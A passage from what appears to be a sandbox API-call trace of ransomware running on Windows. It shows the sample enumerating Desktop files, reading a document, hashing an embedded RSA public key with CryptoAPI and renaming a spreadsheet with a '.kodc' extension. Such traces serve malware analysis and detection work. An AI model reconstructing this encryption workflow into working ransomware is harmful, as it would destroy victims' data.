StringUuid=0x9e2fa40) returned 0x0 [0097.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.669] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.669] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.669] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x99a0) returned 0x9ba4d90 [0097.670] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fd50 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fd98 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.670] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.670] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a670 [0097.670] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a658 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.671] GetCurrentThreadId () returned 0x42c [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695e28 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.671] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.671] GetCurrentThreadId () returned 0x42c [0097.671] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a658 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.672] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.672] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a688 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.673] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.673] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a658 | out: hHeap=0x630000) returned 1 [0097.674] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x9998, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.674] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.674] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.674] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.674] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.674] CloseHandle (hObject=0x5cc) returned 1 [0097.676] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BC_f1u.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bc_f1u.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\BC_f1u.ods.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bc_f1u.ods.kodc")) returned 1 [0097.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0097.676] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.676] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.678] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0097.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0097.678] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0097.678] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9b70350, ftCreationTime.dwHighDateTime=0x1d5b7fd, ftLastAccessTime.dwLowDateTime=0x1a6fa990, ftLastAccessTime.dwHighDateTime=0x1d5b88e, ftLastWriteTime.dwLowDateTime=0x1a6fa990, ftLastWriteTime.dwHighDateTime=0x1d5b88e, nFileSizeHigh=0x0, nFileSizeLow=0x17ee0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dSzm6_6rQ5oFPRjOyx.docx", cAlternateFileName="DSZM6_~1.DOC")) returned 1 [0097.678] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dSzm6_6rQ5oFPRjOyx.docx") returned=".docx" [0097.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dSzm6_6rQ5oFPRjOyx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dszm6_6rq5ofprjoyx.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.678] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=98016) returned 1 [0097.678] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.681] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17eba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.681] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.682] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.682] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.683] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x17ee0, lpOverlapped=0x0) returned 1 [0097.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.683] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.683] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.684] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.684] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.684] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.684] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.685] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.685] GetLastError () returned 0x0 [0097.685] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.685] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.685] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.685] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.685] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.685] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.685] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17ee0) returned 0x9ba4d90 [0097.686] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fd98 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a628 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333feb8 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a640 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a670 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a688 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.686] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.686] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a688 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a670 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0097.686] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a688 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a670 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0097.687] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.687] GetCurrentThreadId () returned 0x42c [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695eb8 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.687] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.687] 